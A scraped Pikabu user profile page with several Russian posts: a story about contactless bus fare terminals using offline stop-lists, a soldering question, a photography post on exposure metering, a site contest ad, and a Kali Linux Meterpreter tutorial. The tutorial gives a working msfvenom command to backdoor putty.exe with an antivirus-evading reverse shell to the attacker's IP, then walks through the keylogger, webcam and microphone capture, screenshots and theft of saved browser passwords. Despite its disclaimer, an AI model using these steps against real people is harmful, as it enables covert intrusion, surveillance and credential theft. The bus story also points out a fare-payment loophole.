DevoteeRZN

DevoteeRZN

пикабушник
пол: мужской
поставил 678 плюсов и 113 минусов
проголосовал за 0 редактирований
сообщества:
Фото Мир Электротранспорт Реклама как искусство Скриншоты комментов Лига Сисадминов
2720 рейтинг 4 подписчика 773 комментария 14 постов 2 в "горячем"
555

Приключения с Visa payWave

Вечер добрый. Недавно в нашем городе(а может уже и давно) на автобусах и троллейбусах появились данные стикеры:

Приключения с Visa payWave Виза, Карты, Автобус, Рязань, Длиннопост

Оплата телефоном тоже поддерживается(если ваш телефон это умеет конечно же).


Как раз моя старая карта уже собиралась склеить ласты и было принято решение, что стоит потратиться на бесконтактную Визу и опробовать это интересное нововведение в нашем городе-полумиллионнике. Сказано - сделано.

После получения, ей же и воспользовался, так как наличка у меня кончилась, а на карте осталось 50 рублей(Из 1000 положенных на карту - 900 ушли на оплату карты, 50 ушло на автоплатёж, который мне таки втёрли в банке). В автобусе кондуктор очень удивилась этой карте и что ей вообще можно что-то оплачивать но всё же приложила её к терминалу. На следующее утро кондуктор попался другой, не менее непрошаренный и уже не решилась сама приложить карту, что сделал я сам. К этому времени на карте осталось 14 рублей и мне таки стоило в этот же день положить на неё рублей 10 хотя-бы, но об этом далее.

Новомодные терминалы Визы выглядят как-то так:

Приключения с Visa payWave Виза, Карты, Автобус, Рязань, Длиннопост

Весёлые приключения начались утром, когда мою свежепополненную карту(114 рублей уж точно хватит на проезд стоимостью 18 рублей, не так ли?) терминал не принял с какими-то ошибками(мне не сказали текст на экране. Вероятно, кондуктор и сама его не видит, ведь в момент оплаты, экран перекрывается картой. Гениально)

Приключения с Visa payWave Виза, Карты, Автобус, Рязань, Длиннопост

Тут уже удивился не только кондуктор, но и я. Ну чтож поделать, проехал бесплатно(100 на карте, в кармане - рубль). После учёбы нужно было прокатиться по некоторым делам и я сел опять в автобус(потому что наличных так и не появилось), а там уже догадался посмотреть на экран и узрел надпись "Банковская карта в стоп-листе". Я оху... Моему удивлению не было предела. В этот момент рухнули мои планы и было принято решение зайти в банк. Дойдя назад пару остановок, сел в автобус, из которого меня выгнали, так как не оплатил проезд, а налички у меня нет. Повезло в следующем(третий автобус, где проезд стал бесплатным), который ехал следом. Там же мне кондуктор дала номер обслуживания терминалов, который я тут никогда не напишу, так как он оказался внутренним для автоколонны и о нём не положено знать третьим лицам. В банке мне сказали, что всё нормально и карта рабочая и отправили разбираться к кондукторам, предварительно отправив проверять карту в магазине, что не особо интересно. Она рабочая оказалась.

Приключения с Visa payWave Виза, Карты, Автобус, Рязань, Длиннопост

В автобусе меня обозвали слепым:

Я: Но она же рабочая! Вчера ездил и нормально было!

Кондуктор: Ты читать умеешь? Карта в стоп-листе!

Доводы, что я только что из банка и карта рабочая - ни к чему не привели и мне пришлось проехать одну остановку(вообще так и надо было, поэтому не сильно огорчился, когда меня высадили на следующей :D). После магазина я прям попал под время прибытия автобуса и там меня уже послали лесом, так как этот кондуктор ехала в прошлом автобусе на работу и была свидетелем моей лажи с картой. Всё равно она приняла карту и оплата прошла(позже я понял, почему она прошла). Оплатить картой проезд назад не получилось: "карта в стоп-листе", но меня довезли бесплатно. Уже 5 автобусов из 6, где проезд был для меня бесплатным.

Приключения с Visa payWave Виза, Карты, Автобус, Рязань, Длиннопост

Самое интересное: разговор со специалистом, который сказал, что "кондуктор был не совсем прав, дав вам этот номер, так как он для внутреннего использования, но раз уж дозвонились - какая у вас проблема?". Рассказав всю офигительную историю, мне поведали схему работы терминалов автобусов и троллейбусов:

При открытии смены, терминал синхронизируется с сервером(каким образом - мне не сказали) и получает стоп-листы. Стоп-лист это такая база, в которой хранятся номера карт с балансом менее 18 рублей(Возможно, там хранятся вообще все карты со всеми балансами, но это что-то слишком крутая информация для терминала). Терминалы работают в оффлайне всё время и у них нет выхода в интернет. Соответственно, у терминала моя карта числится с 14 рублями, так как сотка была закинута после открытия смен на автобусах(кроме одного, где проезд был оплачен всё же). Отсюда и были все проблемы с "карта в стоп-листе".

Получается, что я могу положить на карту 20 рублей и ездить весь день на эту двадцатку(банк не знает о транзакции), а вечером уйти в огромный минус(смена закрыта. Банк узнал о моих поездках). В момент написания этих строк, приходит смска об оплате проезда :D

Автобус, в котором прошла оплата - доехал до конечной и кондуктор закрыл смену.

Вывод: если вы студент и оплачиваете бесконтактной картой проезд - не наступайте на мои грабли и держите там хотя-бы одну сумму проезда. В случае чего - погАсите долг перед банком, а кондукторы не будут на вас залупаться, что карта нерабочая, потому что кое-кто не обновил смену и в памяти терминала находится старая информация о карте.

Бянометр ругается на картиночки в посте)

Показать полностью 4
25

Потеряны контактные площадки

Добрый вечер. У друга был убит коннектор тачскрина и он решил его выпаять, при этом потеряв на плате контактные площадки коннектора. Ещё бы он их не потерял. Выпаивал паяльником из фикспрайса за 50 рублей. Из 9-10 площадок осталось в живых всего 3 или 4. Есть какие-нибудь способы починить это дерьмо? Ведь даже напрямую нельзя запаять, так как некуда просто.

Потеряны контактные площадки Тачскрин, Коннектор, Помощь, Пайка

Качество так себе, но уцелевших видно нормально

13

Kali Linux. Возможности Meterpreter. Часть 1.

Привет. Начну с того, что применять данную информацию против кого-либо, с кем вы не договорились заранее и не получили разрешение(желательно в письменном виде с подписью) - незаконно. Все действия лежат только на ваших плечах и совести. Вся информация предоставлена в ознакомительных целях. Иначе за вами выедут.

Начнём. Возможно, это Часть 1.


Если вы заглянули сюда - значит вы чуточку знаете, что такое Kali Linux и metasploit framework. Если нет, то:

Kali Linux — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони (Mati Aharoni) и Макс Мозер (Max Moser). Предназначен прежде всего для проведения тестов на безопасность.


Metasploit Framework — удобная платформа для создания и отладки эксплойтов. Кроме того, проект включает в себя базу опкодов, архив шеллкодов и информацию по исследованиям компьютерной безопасности.


Хакер: Kali Linux 2017.1

Жертва: Windows 10 1703 x64


Для начала нам нужно, чтобы наш заражённый файл был запущен на компе/ноутбуке жертвы. Как вы это будете делать - без понятия. Я буду применять свой комп, а Кали у меня на ноуте.


Процесс создания заражённого файла:

1. Внезапно нам нужен файл. В моём примере будет putty, хотя можно юзануть и exe какого-нибудь хрома, например, и потом заражённый файл вернуть на место взамен оригинального. Вы ничего не видели и не знаете

2. Переходим в папку с файлом, либо будем писать полный путь до файла, что не круто.

3. Пишем msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.0.101 -e x86/shikata_ga_nai -i 5 -b "\x00" -f exe -o putty3.exe

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Поясню, что тут есть:

msfvenom - собсно, создатель троянов/инжектор троянов в .exe

-a x86 - архитектура x86. Для x86 приложений

--platform windows - платформа Windows ¯\_(ツ)_/¯, работает вместе с прошлым атрибутом.

-x putty.exe - файл, который мы заражаем

-k - Без понятия, вот как в оригинале: Preserve the template behavior and inject the payload as a new thread. Что-то типа "встроить нагрузку"

-p windows/meterpreter/reverse_tcp - "полезная нагрузка"

lhost=192.168.0.101 - ip атакующего

-e x86/shikata_ga_nai - шифрование, чтоб антивирусы не палили

-i 5 - количество итераций шифрования. У меня 5.

-b "\x00" - что-то связанное с "плохими символами(bad-chars)"

-f exe - формат файла

-o putty3.exe - выходной файл, который надо отправить жертве

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

У меня тут 10 итераций(-i 10).

Данный файл любым методом переносится на комп жертвы и запускается или удаляется антивирусом сразу после переноса


Скан Virustotal:

35/64, но для тестов сгодится. Если шифровать разными шифрованиями тыщу раз, то будет меньше палева.

https://www.virustotal.com/#/file/41560e71ef6a7c961b73a77bc9...

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Запускаем metasploit framework и ждём.

Нас встретит "msf >"

Команды выглядят так:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > show options (показывает, что можно настроить)

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Пишем "set LHOST 192.168.0.101", в моём случае. У вас, ясное дело, ваш ip Kali Linux.

LHOST и LPORT должны быть теми, которые мы указали в msfvenom.


Подразумевается, что жертва уже запустила файл и у нас есть доступ. Иначе просто не откроется сессия.

Заражённая программа внешне ничем не отличается от оригинала:

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Обычная программа. Только закрывается через несколько секунд.

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

На ноуте в это время пишем exploit и видим это:

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Если вы напишете сначала на кириллице, а потом сотрёте и напишете как надо - всё равно символ останется и выдаст ошибку, что у меня и произошло. Странный баг, но забавный. Иногда бесячий.


"meterpreter > " означает, что мы в системе и можем делать что угодно, но перед этим надо перекинуть "заражённый процесс в другой процесс". Чтобы путти мог закрыться и не закрыл вместе с собой сессию.

Пишем ps и видим список процессов. Надо выбрать тот, который закрывать не будут. Например, проводник, который именуется explorer.exe

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

PID у него 3044. 2800 это PPID и он нам не нужен.

пишем "migrate 3044" и готово.

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

5412 - прошлый PID. Если закрыть putty - закроется и соединение. После миграции в explorer.exe Путти может спокойно закрыться и соединение не пропадёт.



Мы в системе. Начинается самое интересное. Сверху текст, снизу картинка. Как и везде.


Возможности meterpreter.

Пойдём от простого к интересному. Некоторую дичь затрагивать не буду. Она интересна, вероятно, каким-то редким людям и в некоторых случаях.


1. help. Выдаст возможные команды, но далеко не все. Даже показывать не буду, там крайне мало инфы.

2. sysinfo. и так понятно, что даёт

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

3. getsystem - должно дать права админа, но на Win10 не работает

4. getuid - узнать имя компа

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

5. screenshot - делает снимок экрана жертвы в нативном разрешении монитора жертвы. Куда сохраняет - написано. Скриншот в скриншоте.

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

6. Команды для вебкамеры:

webcam_chat - o_O

webcam_list - список вебкамер у жертвы

webcam_snap - делает снимок на камеру

webcam_stream - вебка в прямом эфире

Не смогу показать, нет вебкамеры и вряд-ли теперь будет.


7. record_mic - записывает с микрофона, но у меня сразу же останавливает. Наверное, особенности Win10 и того, что не получилось ввести getsystem.


8. Кейлоггер:

keyscan_start - включает кейлоггер

keyscan_dump - показывает, что напечатали

keyscan_stop - выключает кейлоггер

Ловит только английские буквы

ololoo, test keylogger

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

9. uictl [enable/disable] [keyboard/mouse/all] - должно включать/выключать клаву/мышь/и то и другое, но на Win10 не сработало. На Win7 работало.


Неинтересное закончилось, пора переходить к интересному:

Команды вида "run *что-то*". Они уже более интересные. Тут уже нет порядка крутости, тут всё годно. Может быть, когда-нибудь, я проверю все команды и сделаю пост на пикабу. Прям такой "тру обзор", но это не точно.

Чтобы посмотреть все доступные команды - пишем "run " и жмём Таб два раза. Нас спросят "хотите ли вы вывести всё на экран?" а там 200+ позиций. Жмём "y", потом пробел несколько раз, отмотав до конца и видим примерно это:

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

Всё я показывать не буду, там очень много. Пост не резиновый.

Ах да, иногда может писать, что скрипт не поддерживается в meterpreter. Это дубликаты другого скрипта, который там напишут.


1. run post/windows/manage/enable_rdp - должно включать rdp, но "insufficient privileges", потому что getsystem не работает. Вероятно, в других Виндах заработает.

2. run post/windows/gather/enum_chrome и /enum_firefox - уносит данные из этих браузеров. В т.ч. и пароли. На этапе "Preferences" задумывается, но не зависает. Сохраняет в /root/.msf4/loot и удаляет при закрытии MSF.

Открыть можно через SQLite Database Browser, который есть в том же Кали, хоть это и текстовый документ. Надо только в программе выбрать "All files".

Файлы Preference и Decrypted открываются в текстовом редакторе.


Про дубликаты: там есть "run enum_chrome", но MSF пожалуется, что он недоступен в этой версии и скажет "юзайте run post/windows/gather/enum_chrome". Если что-то не работает - читайте, что предлагает MSF.


Что же можно там узнать?

2.1. Автозаполнение

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.2. Историю скачивания файлов

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.3. Историю ссылок скачивания файлов

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.4. Гуглопоиск, видимо

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.5. Историю посещения сайтов

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.6. Логины

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.7. Логины/пароли/сайты, куда подходят логины и пароли

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.8. Закладки

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.9. Телефоны в автозаполнении(если повезёт)

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

2.10. Адреса в автозаполнении(если повезёт)

Kali Linux. Возможности Meterpreter. Часть 1. Kali linux, Хакеры, Metasploit, Длиннопост

На этом пока всё, надо сделать базу к следующему посту и проверить ещё больше вещей в том списке. Вторая часть будет завтра, скорее всего. Но это не точно.

Показать полностью 24
4

Экспозамеры наглядно

Точечный экспозамер:

Замер яркости в одной точке. Как правило - в центре.

Экспозамеры наглядно Экспозиция, Фотография, Samsung Galaxy S6, Samsung

Центро-взвешенный экспозамер:

Замер яркости в центральном воображаемом круге.

Экспозамеры наглядно Экспозиция, Фотография, Samsung Galaxy S6, Samsung

Матричный экспозамер:

Замер яркости во всех зонах кадра и объединение в единый результат.

Экспозамеры наглядно Экспозиция, Фотография, Samsung Galaxy S6, Samsung
Показать полностью 1

Эти открытки сделали пикабушники. Сможете лучше?

Наш дикий конкурс открыток продолжается! Поздравили друзей, босса и любимую учительницу, а потом не помедлили и прислали свое творение нам? Все правильно сделали. Потому что до конца конкурса, в котором мы разыгрываем оригинальные подарочные наборы, осталось меньше 10 дней.


А чтобы поймать музу, вот порция открыток от пользователей Пикабу, которые они сделали в нашем конструкторе. Главное, не стесняйтесь!

Эти открытки сделали пикабушники. Сможете лучше?

Как поучаствовать в конкурсе:

1. Заходите на страницу конструктора.

2. Выбирайте тему: День интернета, День работников леса или 3 сентября (никогда не поздно).

3. Делайте открытку и не забудьте ее сохранить.

4. Отправляйте свою работу в приложении Сбербанк Онлайн (никаких платежей, все бесплатно).

Отличная работа, все прочитано!